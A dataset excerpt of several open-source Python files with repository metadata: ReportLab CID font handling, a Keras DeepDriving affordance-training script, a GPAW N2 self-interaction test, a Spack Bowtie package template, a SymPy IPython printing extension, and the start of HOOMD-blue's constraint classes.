            # ...or by an end ID and a single width for the whole range.
            end, width, data = data[0], data[1], data[2:]
            for idx in range(start, end+1):
                widths[idx] = width
    return widths
def getCharWidth(self, characterId):
    """Width in em-units for *characterId*, falling back to the face default."""
    try:
        return self._explicitWidths[characterId]
    except KeyError:
        return self._defaultWidth
class CIDFont(pdfmetrics.Font):
    "Represents a built-in multi-byte font"
    _multiByte = 1  # flags this font as multi-byte to the rest of pdfmetrics

    def __init__(self, face, encoding):
        """Combine a canned CID typeface with a CMAP encoding.

        Both arguments must come from the whitelists in _cidfontdata.
        """
        assert face in allowedTypeFaces, "TypeFace '%s' not supported! Use any of these instead: %s" % (face, allowedTypeFaces)
        self.faceName = face
        #should cache in registry...
        self.face = CIDTypeFace(face)

        assert encoding in allowedEncodings, "Encoding '%s' not supported! Use any of these instead: %s" % (encoding, allowedEncodings)
        self.encodingName = encoding
        self.encoding = CIDEncoding(encoding)

        #legacy hack doing quick cut and paste.
        self.fontName = self.faceName + '-' + self.encodingName
        self.name = self.fontName

        # need to know if it is vertical or horizontal
        self.isVertical = (self.encodingName[-1] == 'V')

        #no substitutes initially
        self.substitutionFonts = []
def formatForPdf(self, text):
    """Escape *text* for embedding in a PDF string literal."""
    #print 'encoded CIDFont:', encoded
    return _escape(text)
def stringWidth(self, text, size, encoding=None):
    """This presumes non-Unicode input. UnicodeCIDFont wraps it for that context"""
    cids = self.encoding.translate(text)
    if self.isVertical:
        # this part is "not checked!" but seems to work:
        # assume each glyph is 1000 ems high
        return len(cids) * size
    total = 0
    for cid in cids:
        total = total + self.face.getCharWidth(cid)
    return 0.001 * total * size
def addObjects(self, doc):
    """The explicit code in addMinchoObjects and addGothicObjects
    will be replaced by something that pulls the data from
    _cidfontdata.py in the next few days."""
    # Internal PDF name F1, F2, ... based on fonts registered so far.
    internalName = 'F' + repr(len(doc.fontMapping)+1)

    # NOTE(review): this mutates the shared CIDFontInfo entry in place
    # (Name/Encoding keys) — confirm that is intended.
    bigDict = CIDFontInfo[self.face.name]
    bigDict['Name'] = '/' + internalName
    bigDict['Encoding'] = '/' + self.encodingName

    #convert to PDF dictionary/array objects
    cidObj = structToPDF(bigDict)

    # link into document, and add to font map
    r = doc.Reference(cidObj, internalName)
    fontDict = doc.idToObject['BasicFonts'].dict
    fontDict[internalName] = r
    doc.fontMapping[self.name] = '/' + internalName
class UnicodeCIDFont(CIDFont):
    """Wraps up CIDFont to hide explicit encoding choice;
    encodes text for output as UTF16.

    lang should be one of 'jpn',chs','cht','kor' for now.
    if vertical is set, it will select a different widths array
    and possibly glyphs for some punctuation marks.

    halfWidth is only for Japanese.

    >>> dodgy = UnicodeCIDFont('nonexistent')
    Traceback (most recent call last):
    ...
    KeyError: "don't know anything about CID font nonexistent"
    >>> heisei = UnicodeCIDFont('HeiseiMin-W3')
    >>> heisei.name
    'HeiseiMin-W3'
    >>> heisei.language
    'jpn'
    >>> heisei.encoding.name
    'UniJIS-UCS2-H'
    >>> #This is how PDF data gets encoded.
    >>> print heisei.formatForPdf('hello')
    \\000h\\000e\\000l\\000l\\000o
    >>> tokyo = u'\u6771\u4AEC'
    >>> print heisei.formatForPdf(tokyo)
    gqJ\\354
    """

    def __init__(self, face, isVertical=False, isHalfWidth=False):
        #pass
        try:
            lang, defaultEncoding = defaultUnicodeEncodings[face]
        except KeyError:
            raise KeyError("don't know anything about CID font %s" % face)

        #we know the languages now.
        self.language = lang

        #rebuilt encoding string. They follow rules which work
        #for the 7 fonts provided.
        enc = defaultEncoding[:-1]
        if isHalfWidth:
            enc = enc + 'HW-'
        if isVertical:
            enc = enc + 'V'
        else:
            enc = enc + 'H'

        #now we can do the more general case
        CIDFont.__init__(self, face, enc)
        #self.encName = 'utf_16_le'
        #it's simpler for unicode, just use the face name
        self.name = self.fontName = face
        self.vertical = isVertical
        self.isHalfWidth = isHalfWidth

        # per-unichar width table used by stringWidth
        self.unicodeWidths = widthsByUnichar[self.name]
def formatForPdf(self, text):
    """Encode *text* as big-endian UTF-16 without a BOM, then PDF-escape it."""
    #these ones should be encoded asUTF16 minus the BOM
    from codecs import utf_16_be_encode
    #print 'formatting %s: %s' % (type(text), repr(text))
    # Python-2 code path: byte strings are assumed to be UTF-8.
    if type(text) is not unicode:
        text = text.decode('utf8')
    utfText = utf_16_be_encode(text)[0]
    encoded = _escape(utfText)
    #print '  encoded:',encoded
    return encoded

    #
    #result = _escape(encoded)
    #print '    -> %s' % repr(result)
    #return result
def stringWidth(self, text, size, encoding=None):
    "Just ensure we do width test on characters, not bytes..."
    # Python-2 code path: byte strings are decoded as UTF-8 first.
    if type(text) is type(''):
        text = text.decode('utf8')
    widths = self.unicodeWidths
    # Unknown characters are charged the full 1000 em-unit width.
    return size * 0.001 * sum([widths.get(uch, 1000) for uch in text])
    #return CIDFont.stringWidth(self, text, size, encoding)
def precalculate(cmapdir):
    """Parse every CMAP file in *cmapdir* and write a .fastmap beside it.

    Bug fixes relative to the original: the already-done check referenced
    self.name — undefined in a module-level function and wrong in intent —
    instead of the file being examined; and the failure message printed the
    unbound variable enc instead of the file name.
    """
    # crunches through all, making 'fastmap' files
    import os
    files = os.listdir(cmapdir)
    for file in files:
        # Skip files whose fastmap cache already exists.
        if os.path.isfile(cmapdir + os.sep + file + '.fastmap'):
            continue
        try:
            enc = CIDEncoding(file)
        except:
            # NOTE(review): bare except kept deliberately — this is a
            # best-effort batch; narrowing it would change which errors
            # abort the whole run.
            print('cannot parse %s, skipping' % file)
            continue
        enc.fastSave(cmapdir)
        print('saved %s.fastmap' % file)
def test():
    """Manual smoke test: render Japanese text into test_japanese.pdf."""
    # only works if you have correct encodings on your box!
    c = Canvas('test_japanese.pdf')
    c.setFont('Helvetica', 30)
    c.drawString(100,700, 'Japanese Font Support')

    pdfmetrics.registerFont(CIDFont('HeiseiMin-W3','90ms-RKSJ-H'))
    pdfmetrics.registerFont(CIDFont('HeiseiKakuGo-W5','90ms-RKSJ-H'))

    # the two typefaces
    c.setFont('HeiseiMin-W3-90ms-RKSJ-H', 16)
    # this says "This is HeiseiMincho" in shift-JIS. Not all our readers
    # have a Japanese PC, so I escaped it. On a Japanese-capable
    # system, print the string to see Kanji
    message1 = '\202\261\202\352\202\315\225\275\220\254\226\276\222\251\202\305\202\267\201B'
    c.drawString(100, 675, message1)
    c.save()
    print 'saved test_japanese.pdf'

##    print 'CMAP_DIR = ', CMAP_DIR
##    tf1 = CIDTypeFace('HeiseiMin-W3')
##    print 'ascent = ',tf1.ascent
##    print 'descent = ',tf1.descent
##    for cid in [1,2,3,4,5,18,19,28,231,1742]:
##        print 'width of cid %d = %d' % (cid, tf1.getCharWidth(cid))

    encName = '90ms-RKSJ-H'
    enc = CIDEncoding(encName)
    print message1, '->', enc.translate(message1)

    f = CIDFont('HeiseiMin-W3','90ms-RKSJ-H')
    print 'width = %0.2f' % f.stringWidth(message1, 10)

    #testing all encodings
##    import time
##    started = time.time()
##    import glob
##    for encName in _cidfontdata.allowedEncodings:
##    #encName = '90ms-RKSJ-H'
##        enc = CIDEncoding(encName)
##        print 'encoding %s:' % encName
##        print '    codeSpaceRanges = %s' % enc._codeSpaceRanges
##        print '    notDefRanges = %s' % enc._notDefRanges
##        print '    mapping size = %d' % len(enc._cmap)
##    finished = time.time()
##    print 'constructed all encodings in %0.2f seconds' % (finished - started)
if __name__=='__main__':
    # Run the doctests embedded in this module (e.g. UnicodeCIDFont).
    import doctest
    import cidfonts
    doctest.testmod(cidfonts)
    #test()
|
mattjmorrison/ReportLab
|
src/reportlab/pdfbase/cidfonts.py
|
Python
|
bsd-3-clause
| 18,903
|
[
"Brian"
] |
ee6021615cb37a942e9536c0bad00acc3f21dea7f18d6143e7e8ab8cb9622e50
|
from keras.models import Model, model_from_json
from keras.layers import Flatten, Dense, BatchNormalization, Dropout, Reshape, Permute, Activation, Input
from keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.optimizers import SGD, Adam
from keras.callbacks import CSVLogger, ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, TensorBoard
from keras import backend as K
import numpy as np
import h5py
import cv2
from glob import glob
from time import time
from os.path import isfile
from random import shuffle
import matplotlib.pyplot as plt
start_time = time()  # wall-clock start for overall run timing
# Operational notes for running this script on the training box:
# source activate deepenv1
# nohup python train.py &
# ps -ef | grep train.py
# kill UID
def train(db, keys, avg, batch_size, epochs, nb_tr, nb_val, samples=None,
          val_samples=None, labels=True, scale_affords=False):
    """Train the alexnet model on the first nb_tr keys, validating on the
    next nb_val keys.

    NOTE(review): relies on module-level globals defined elsewhere in this
    script (pretrained, weights_filename, model_filename, csvlog, reduce_lr,
    mdlchkpt, tbCallBack, scale_out) — confirm they exist before calling.
    NOTE(review): the labels and scale_affords parameters are not used; the
    generator calls below hard-code labels=True and pass the global scale_out.
    """
    if samples is None:
        samples = int(nb_tr/batch_size)
    if val_samples is None:
        val_samples = int(nb_val/batch_size)
    # Resume from previously saved weights when available.
    if pretrained and isfile(weights_filename):
        model = alexnet(weights_path=weights_filename)
    else:
        model = alexnet()
    # Keras 1.x fit_generator API (samples_per_epoch / nb_epoch).
    model.fit_generator(our_datagen(db, keys[0:nb_tr], avg, batch_size, labels=True, scale_affords=scale_out),
                        samples_per_epoch=samples, nb_epoch=epochs,
                        verbose=2, callbacks=[csvlog, reduce_lr, mdlchkpt, tbCallBack],
                        validation_data=our_datagen(db, keys[nb_tr:nb_tr+nb_val], avg, batch_size, labels=True, scale_affords=scale_out),
                        nb_val_samples=val_samples)
    model.save(model_filename)
    model.save_weights(weights_filename)
    return model
def alexnet(weights_path=None):
    """
    Returns a keras model for a CNN.

    input data are of the shape (227,227), and the colors in the RGB order (default)

    model: The keras model for this convnet
    output_dict: Dict of feature layers, asked for in output_layers.

    NOTE(review): uses the Keras 1.x API (Convolution2D, subsample=,
    Model(input=..., output=...)) and the module-level globals dim and
    same_size.
    """
    inputs = Input(shape=dim)
    conv_1 = Convolution2D(96, 11, 11, subsample=(4, 4), activation='relu', name='conv_1')(inputs)
    # initial weights filler? gaussian, std 0.01
    conv_2 = MaxPooling2D((3, 3), strides=(2, 2))(conv_1)
    conv_2 = BatchNormalization()(conv_2)
    # in caffe: Local Response Normalization (LRN)
    # alpha = 1e-4, k=2, beta=0.75, n=5,
    #conv_2 = ZeroPadding2D((2, 2))(conv_2)
    conv_2 = Convolution2D(256, 5, 5, activation="relu", name='conv_2')(conv_2)
    conv_3 = MaxPooling2D((3, 3), strides=(2, 2))(conv_2)
    conv_3 = BatchNormalization()(conv_3)
    #conv_3 = ZeroPadding2D((1, 1))(conv_3)
    conv_3 = Convolution2D(384, 3, 3, activation='relu', name='conv_3')(conv_3)
    #conv_3 = ZeroPadding2D((1, 1))(conv_3)
    conv_4 = Convolution2D(384, 3, 3, activation="relu", name='conv_4')(conv_3)
    #conv_4 = ZeroPadding2D((1, 1))(conv_4)
    conv_5 = Convolution2D(256, 3, 3, activation="relu", name='conv_5')(conv_4)
    if same_size is True:
        dense_1 = MaxPooling2D((3, 3), strides=(2, 2), name="convpool_5")(conv_5)
        dense_1 = Flatten(name="flatten")(dense_1)
    else:
        dense_1 = Flatten(name="flatten")(conv_5)#(dense_1)
    # initial weights filler? gaussian, std 0.005
    dense_1 = Dense(4096, activation='relu', name='dense_1')(dense_1)
    dense_2 = Dropout(0.5)(dense_1)
    dense_2 = Dense(4096, activation='relu', name='dense_2')(dense_2)
    dense_3 = Dropout(0.5)(dense_2)
    # initial weights filler? gaussian, std 0.01
    dense_3 = Dense(256, activation='relu', name='dense_3')(dense_3)
    dense_4 = Dropout(0.5)(dense_3)
    # output: 14 affordances, gaussian std 0.01
    dense_4 = Dense(13, activation='linear', name='dense_4')(dense_4)
    # dense_4 = Dense(14, activation='linear', name='dense_4')(dense_4)

    model = Model(input=inputs, output=dense_4)
    model.summary()
    # NOTE(review): this blocks until the user presses Enter — a debugging
    # leftover?  It prevents unattended (nohup) training runs; confirm.
    raw_input("Press Enter to continue...")
    if weights_path:
        model.load_weights(weights_path)

    # sgd = SGD(lr=0.01, decay=0.0005, momentum=0.9) # nesterov=True) # LSTM
    adam = Adam(lr=5e-4)
    model.compile(optimizer=adam, loss='mse', metrics=['mae'])  # try cross-entropy
    return model
def our_datagen(db, keys, avg, batch_size, labels=True, scale_affords=False):
    """Yield training batches (X, Y) — or just X when labels is False.

    Images are read from the paths in keys, resized (unless same_size),
    normalized to [0,1] and mean-centred with avg; affordance rows are
    looked up in db by the 8-digit number embedded in the file name.

    Bug fix: batch slicing now strides by batch_size
    (keys[index*batch_size:(index+1)*batch_size]).  The original sliced
    keys[index:index+batch_size], so successive "batches" overlapped by
    batch_size-1 items and only the first n+batch_size-1 keys were ever
    used — the row indexing i+index*batch_size in predict_affordances
    confirms strided batches were intended.
    """
    n = int(len(keys) / batch_size)
    affordance_dim = 13
    for index in range(0, n):
        xdim = (batch_size,) + dim
        X_train = np.zeros(xdim)
        Y_train = np.zeros((batch_size, affordance_dim))
        batch_keys = keys[index * batch_size:(index + 1) * batch_size]
        for i, key in enumerate(batch_keys):
            img = cv2.imread(key)
            # img.shape = 210x280x3
            if not same_size:
                img = cv2.resize(img, (64, 64))
            img = img / 255.0
            img = np.subtract(img, avg)
            if K.image_dim_ordering() == 'th':
                # channels-first backend: HWC -> CHW
                img = np.swapaxes(img, 1, 2)
                img = np.swapaxes(img, 0, 1)
            X_train[i] = img
            if labels is True:
                # Files are named ...NNNNNNNN.ext; db rows are 1-indexed by
                # that number, with the index stored in column 0.
                j = int(key[-12:-4])
                affordances = db[j - 1]
                if int(affordances[0]) != j:
                    raise ValueError('Image and affordance do not match: ' + str(j))
                affordances = affordances[1:(affordance_dim + 1)]
                if scale_affords is True:
                    affordances = scale_output(affordances)
                affordances = affordances.reshape(1, affordance_dim)
                Y_train[i] = affordances
        if labels is True:
            yield X_train, Y_train
        else:
            yield X_train
def predict_affordances(db, keys, avg, model, batch_size, verbose=0, scale_affords=False):
    """Run the model over `keys` and compare against ground truth.

    Args:
        db: affordance array; column 0 is the 1-based image index,
            columns 1..13 the affordance values.
        keys: image file paths (index encoded in the last 8 digits of
            the file name, before the extension).
        avg: mean image subtracted from each normalized frame.
        model: compiled Keras model used for prediction.
        batch_size: samples per progress-reporting batch.
        verbose: when 1, print progress after each batch.
        scale_affords: when True, scale ground truth via scale_output().

    Returns:
        (Y_pred, Y_true, err, err_avg): predictions, ground truth,
        per-sample absolute errors, and the per-affordance mean error.

    Note: relies on the module-level global `same_size`.
    """
    nb_ts = len(keys)
    nb = int(nb_ts / batch_size)
    affordance_dim = 13
    Y_true = np.zeros((nb * batch_size, affordance_dim))
    Y_pred = np.zeros((nb * batch_size, affordance_dim))
    err = np.zeros((nb * batch_size, affordance_dim))
    for index in range(0, nb):
        # BUG FIX: stride by batch_size. The original sliced
        # keys[index:index+batch_size], which walked one sample at a
        # time and re-evaluated overlapping samples.
        batch_keys = keys[index * batch_size:(index + 1) * batch_size]
        for i, key in enumerate(batch_keys):
            img = cv2.imread(key)
            # Source frames are 210x280x3; optionally shrink to 64x64.
            if not same_size:
                img = cv2.resize(img, (64, 64))
            img = img / 255.0
            img = np.subtract(img, avg)
            if K.image_dim_ordering() == 'th':
                # Theano ordering wants channels first (HWC -> CHW).
                img = np.swapaxes(img, 1, 2)
                img = np.swapaxes(img, 0, 1)
            img = np.expand_dims(img, axis=0)
            # File name encodes the 1-based affordance row index.
            j = int(key[-12:-4])
            affordances = db[j - 1]
            if int(affordances[0]) != j:
                raise ValueError('Image and affordance do not match: ' + str(j))
            affordances = affordances[1:(affordance_dim + 1)]
            if scale_affords is True:
                affordances = scale_output(affordances)
            affordances = affordances.reshape(1, affordance_dim)
            affords_pred = model.predict(img)
            row = i + index * batch_size
            Y_true[row] = affordances
            Y_pred[row] = affords_pred
            err[row] = np.abs(affords_pred - affordances)
        # FIX: original used `verbose is 1`, which relies on CPython
        # small-int interning; use value equality.
        if verbose == 1:
            test = (index + 1) * batch_size
            print('Number of samples predicted so far:' + str(test))
    err_avg = err.mean(axis=0)
    return Y_pred, Y_true, err, err_avg
def scale_output(affordances):
    ''' Scale output between [0.1, 0.9]

    Each of the 13 affordance entries is divided by a per-affordance
    range and shifted by a per-affordance offset. The input is modified
    in place and also returned.
    '''
    # (divisor, offset) per affordance, in order:
    # angle, toMarking_L, toMarking_M, toMarking_R, dist_L, dist_R,
    # toMarking_LL, toMarking_ML, toMarking_MR, toMarking_RR,
    # dist_LL, dist_MM, dist_RR
    params = (
        (1.1, 0.5),
        (5.6249, 1.34445),
        (6.8752, 0.39091),
        (5.6249, -0.34445),
        (95, 0.12),
        (95, 0.12),
        (6.8752, 1.48181),
        (6.25, 0.98),
        (6.25, 0.02),
        (6.8752, -0.48181),
        (95, 0.12),
        (95, 0.12),
        (95, 0.12),
    )
    for idx, (divisor, offset) in enumerate(params):
        affordances[idx] = affordances[idx] / divisor + offset
    return affordances
def descale_output(affordances):
    """Invert scale_output() for a batch of scaled affordance rows.

    Args:
        affordances: array of shape (n, 13) holding scaled values.

    Returns:
        A new array of the same shape with each column mapped back to
        its original physical range.
    """
    # (offset, multiplier) per affordance column; exact inverse of the
    # (divisor, offset) pairs used by scale_output().
    params = (
        (0.5, 1.1),
        (1.34445, 5.6249),
        (0.39091, 6.8752),
        (-0.34445, 5.6249),
        (0.12, 95),
        (0.12, 95),
        (1.48181, 6.8752),
        (0.98, 6.25),
        (0.02, 6.25),
        (-0.48181, 6.8752),
        (0.12, 95),
        (0.12, 95),
        (0.12, 95),
    )
    affordances_unnorm = np.zeros(affordances.shape)
    for col, (offset, multiplier) in enumerate(params):
        affordances_unnorm[:, col] = (affordances[:, col] - offset) * multiplier
    return affordances_unnorm
def load_average(path='/home/exx/Avinash/DReD/local/deepdriving_average.h5'):
    """Load the precomputed mean training image.

    Args:
        path: HDF5 file containing an 'average' dataset. Defaults to the
            original hard-coded location for backward compatibility.

    Returns:
        The 'average' dataset read into a numpy array.
    """
    # Context manager guarantees the handle is closed even if the read
    # raises (the original leaked the handle on error).
    with h5py.File(path, 'r') as h5f:
        return h5f['average'][:]
if __name__ == "__main__":
    # Paths to the training images and the affordance ground truth.
    dbpath = '/data/deepdriving/train_images/'
    keys = glob(dbpath + '*.jpg')
    #keys.sort()
    db = np.load(dbpath + 'affordances.npy')
    # TODO : shuffle and keep aligned
    db = db.astype('float32')
    avg = load_average()
    # Experiment switches: affordance scaling, native image size,
    # pretrained weights, and the run index used to name model files.
    scale_out = False
    same_size = True
    pretrained = False
    model_num = 9
    folder = "/home/exx/Avinash/DReD/local/"
    model_filename = folder + 'models/cnnmodel%d.json' % model_num
    weights_filename = folder + 'models/cnnmodel%d_weights.h5' % model_num
    logs_path = folder + "models/run%d/" % model_num
    csvlog_filename = folder + 'models/cnnmodel%d.csv' % model_num
    # tensorboard --logdir /home/exx/Avinash/DReD/local/models/
    tbCallBack = TensorBoard(log_dir=logs_path, histogram_freq=0, write_graph=True, write_images=False)
    csvlog = CSVLogger(csvlog_filename, separator=',', append=False)
    mdlchkpt = ModelCheckpoint(weights_filename, monitor='val_loss', save_best_only=True, save_weights_only=True, period=2, verbose=1)
    erlystp = EarlyStopping(monitor='val_loss', min_delta=1e-4, patience=10, verbose=1)
    reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.8, patience=5, min_lr=1e-5, verbose=1)
    # Input tensor layout depends on the Keras backend ordering.
    if K.image_dim_ordering() == 'tf':
        print('Tensorflow')
        if same_size:
            dim = (210, 280, 3)
        else:
            dim = (64, 64, 3)
    else:
        print('Theano')
        if same_size:
            dim = (3, 210, 280)
        else:
            dim = (3, 64, 64)
    # avg.shape = 210x280x3
    if not same_size:
        avg = cv2.resize(avg, (64, 64))
    # Dataset split sizes (train / validation / test samples).
    batch_size = 32
    epochs = 25
    nb_tr = 350000
    nb_val = 50000
    nb_ts = 5056 #84800
    if os.path.exists(model_filename):
        # Reuse a previously trained model: load architecture + weights.
        json_file = open(model_filename, 'r')
        model_json = json_file.read()
        json_file.close()
        print('Model found and loading ...')
        model = model_from_json(model_json)
        print("Loading the best weights for evaluation")
        model.load_weights(weights_filename)
        adam = Adam(lr=5e-4)
        model.compile(optimizer=adam, loss='mse',metrics=['mae']) # try cross-entropy
    else:
        # Train from scratch, then persist the architecture to JSON
        # (weights are written by the ModelCheckpoint callback).
        print('New model is built and training...')
        model = train(db, keys, avg, batch_size, epochs, nb_tr, nb_val , samples=None, val_samples=None, labels=True,scale_affords=scale_out)
        print("Loading the best weights for evaluation")
        model.load_weights(weights_filename)
        # saving the model to disk
        model_json = model.to_json()
        with open(model_filename, "w") as json_file:
            json_file.write(model_json)
        print("Saved model to disk")
    # Evaluate on the held-out test slice of the key list.
    ts_samples = int(nb_ts/batch_size)
    score = model.evaluate_generator(our_datagen(db, keys[nb_tr+nb_val:nb_tr+nb_val+nb_ts], avg, batch_size), ts_samples)
    print('TestData MSE:', score[0])
    print('TestData MAE', score[1])
    Y_pred, Y_true, err, err_avg = predict_affordances(db, keys[nb_tr+nb_val:nb_tr+nb_val+nb_ts], avg, model, batch_size, verbose=1, scale_affords = scale_out)
    if scale_out is True:
        # Map scaled predictions/targets back to physical units.
        Y_pred_unnorm = descale_output(Y_pred)
        Y_true_unnorm = descale_output(Y_true)
        err = descale_output(err)
        err_avg = descale_output(err_avg.reshape(1,13))
    # NOTE(review): start_time is defined earlier in the file.
    print("Time taken is %s seconds " % (time() - start_time))
|
babraham123/deepdriving
|
new/avimodel/train_idg.py
|
Python
|
mit
| 13,067
|
[
"Gaussian"
] |
bbdaddbb744281a8478146524e1c48a175c306a061b6c8e7e7295d0a8251313e
|
import numpy as np
from ase import Atoms
from gpaw import GPAW
from gpaw.xc.sic import SIC
from gpaw.test import equal
# Cubic cell edge length in Angstrom.
a = 7.0
# Isolated N atom with initial magnetic moment 3, and an N2 molecule
# with a 1.14 Angstrom bond along z, each centered in its own cell.
atom = Atoms('N', magmoms=[3], cell=(a, a, a))
molecule = Atoms('N2', positions=[(0, 0, 0), (0, 0, 1.14)], cell=(a, a, a))
atom.center()
molecule.center()
# Self-interaction-corrected XC functional, grid spacing h=0.17,
# HGH pseudopotential setups; log goes to the txt file.
calc = GPAW(xc=SIC(),
            h=0.17,
            txt='n2.sic.new3b.txt',
            setups='hgh')
atom.set_calculator(calc)
e1 = atom.get_potential_energy()
molecule.set_calculator(calc)
e2 = molecule.get_potential_energy()
F_ac = molecule.get_forces()
# Print the atomization energy (2*E_atom - E_molecule) and the forces.
# NOTE(review): Python 2 print statements.
print 2 * e1 - e2
print F_ac
|
ajylee/gpaw-rtxs
|
gpaw/test/scfsic_n2.py
|
Python
|
gpl-3.0
| 573
|
[
"ASE",
"GPAW"
] |
efc45f53f57479137e7086ebf536b57c5ba5b78656fc02b13d86fbce57f12c8a
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Bowtie(MakefilePackage):
    """Bowtie: an ultrafast, memory-efficient short read aligner.

    NOTE(review): this is a Spack tutorial package template; the FIXME
    markers below are intentionally left for the tutorial reader.
    """
    # FIXME: Add a proper url for your package's homepage here.
    homepage = "http://www.example.com"
    url      = "https://downloads.sourceforge.net/project/bowtie-bio/bowtie/1.2.1.1/bowtie-1.2.1.1-src.zip"
    version('1.2.1.1', 'ec06265730c5f587cd58bcfef6697ddf')
    # FIXME: Add dependencies if required.
    # depends_on('foo')
    def edit(self, spec, prefix):
        # FIXME: Edit the Makefile if necessary
        # FIXME: If not needed delete this function
        # makefile = FileFilter('Makefile')
        # makefile.filter('CC = .*', 'CC = cc')
        return
|
skosukhin/spack
|
lib/spack/docs/tutorial/examples/Makefile/0.package.py
|
Python
|
lgpl-2.1
| 1,934
|
[
"Bowtie"
] |
1bd1246153e8e93410fa7d4d08dd3a4e8b95ee60779e464c57892b962c4143ef
|
"""
A print function that pretty prints SymPy objects.
:moduleauthor: Brian Granger
Usage
=====
To use this extension, execute:
%load_ext sympy.interactive.ipythonprinting
Once the extension is loaded, SymPy Basic objects are automatically
pretty-printed in the terminal and rendered in LaTeX in the Qt console and
notebook.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from sympy.interactive.printing import init_printing
#-----------------------------------------------------------------------------
# Definitions of special display functions for use with IPython
#-----------------------------------------------------------------------------
def load_ipython_extension(ip):
    """Load the extension in IPython.

    Called by IPython's ``%load_ext`` machinery; enables SymPy's
    pretty/LaTeX printing for the given shell instance.
    """
    init_printing(ip=ip)
|
amitjamadagni/sympy
|
sympy/interactive/ipythonprinting.py
|
Python
|
bsd-3-clause
| 1,230
|
[
"Brian"
] |
3c41789d413561c1167681bdaab9b798cf069ffdfd0f0ce18f0e204d225dcc79
|
# Copyright (c) 2009-2021 The Regents of the University of Michigan This file is
# part of the HOOMD-blue project, released under the BSD 3-Clause License.
# Maintainer: joaander / All Developers are free to add commands for new
# features
r"""Constraints.
Constraint forces can constrain particles to be a set distance from each other,
to have some relative orientation, or impose other types of constraint.
The `Rigid` class is special in that only one is allowed in a system and is set
to an `hoomd.md.Integrator` object separately in the
`rigid <hoomd.md.Integrator.rigid>` attribute.
Warning:
Constraints will be invalidated if two separate constraints apply to the
same particle.
The degrees of freedom removed from the system by constraints are
accounted for in `hoomd.md.ThermodynamicQuantities`.
"""
from hoomd.md import _md
from hoomd.data.parameterdicts import ParameterDict, TypeParameterDict
from hoomd.data.typeparam import TypeParameter
from hoomd.data.typeconverter import OnlyIf, to_type_converter
import hoomd
from hoomd.operation import _HOOMDBaseObject
class Constraint(_HOOMDBaseObject):
    """A constraint force that acts on the system."""
    def _attach(self):
        """Create the c++ mirror class."""
        # GPU variants of the C++ classes carry a "GPU" name suffix.
        cls_name = self._cpp_class_name
        if not isinstance(self._simulation.device, hoomd.device.CPU):
            cls_name += "GPU"
        self._cpp_obj = getattr(_md, cls_name)(
            self._simulation.state._cpp_sys_def)
        super()._attach()
class Distance(Constraint):
    """Constrain pairwise particle distances.
    Args:
        tolerance (float): Relative tolerance for constraint violation warnings.
    `Distance` applies forces between particles to constrain the distances
    between particles to specific values. The algorithm implemented is described
    in:
    1. M. Yoneya, H. J. C. Berendsen, and K. Hirasawa, "A Non-Iterative
       Matrix Method for Constraint Molecular Dynamics Simulations," Molecular
       Simulation, vol. 13, no. 6, pp. 395--405, 1994.
    2. M. Yoneya, "A Generalized Non-iterative Matrix Method for Constraint
       Molecular Dynamics Simulations," Journal of Computational Physics,
       vol. 172, no. 1, pp. 188--197, Sep. 2001.
    Each distance constraint takes the form:
    .. math::
        \\chi_{ij}(r) = (\\vec{r}_j - \\vec{r}_i) \\cdot
            (\\vec{r}_j - \\vec{r}_i)
            - d_{ij}^2 = 0
    In brief, the second derivative of the Lagrange multipliers with respect to
    time is set to zero, such that both the distance constraints and their time
    derivatives are conserved within the accuracy of the Velocity Verlet scheme,
    i.e. within :math:`\\Delta t^2`. The corresponding linear system of
    equations is solved. Because constraints are satisfied at :math:`t + 2
    \\Delta t`, the scheme is self-correcting and drifts are avoided.
    .. hint::
        Define the particles (:math:`i,j`) and distances (:math:`d_{ij}`) for
        each pairwise distance constraint in a GSD file with
        `gsd.hoomd.Snapshot.constraints` or in a `hoomd.Snapshot` with
        `hoomd.Snapshot.constraints`.
    Warning:
        In MPI simulations, all particles connected through constraints will be
        communicated between ranks as ghost particles. Therefore, it is an
        error when molecules defined by constraints extend over more than half
        the local domain size.
    Note:
        `tolerance` sets the tolerance to detect constraint violations and
        issue a warning message. It does not influence the computation of the
        constraint force.
    Attributes:
        tolerance (float): Relative tolerance for constraint violation warnings.
    """
    # C++ backend class name; Constraint._attach resolves CPU/GPU variants.
    _cpp_class_name = "ForceDistanceConstraint"
    def __init__(self, tolerance=1e-3):
        # Register tolerance as a managed parameter; float() coerces int
        # arguments so the C++ side always receives a double.
        self._param_dict.update(ParameterDict(tolerance=float(tolerance)))
class Rigid(Constraint):
    R"""Constrain particles in rigid bodies.
    .. rubric:: Overview
    Rigid bodies are defined by a single central particle and a number of
    constituent particles. All of these are particles in the HOOMD system
    configuration and can interact with other particles via md forces. The
    mass and moment of inertia of the central particle set the full mass and
    moment of inertia of the rigid body (constituent particle mass is ignored).
    The central particle is at the center of mass of the rigid body and the
    orientation quaternion defines the rotation from the body space into the
    simulation box. Body space refers to a rigid body viewed in a particular
    reference frame, namely, in body space, the center of mass of the body is at
    :math:`(0,0,0)` and the moment of inertia is diagonal. You specify the
    constituent particles to `Rigid` for each type of body in body coordinates.
    Then, `Rigid` takes control of those particles, and sets their position and
    orientation in the simulation box relative to the position and orientation
    of the central particle. `Rigid` also transfers forces and torques from
    constituent particles to the central particle. Then, MD integrators can use
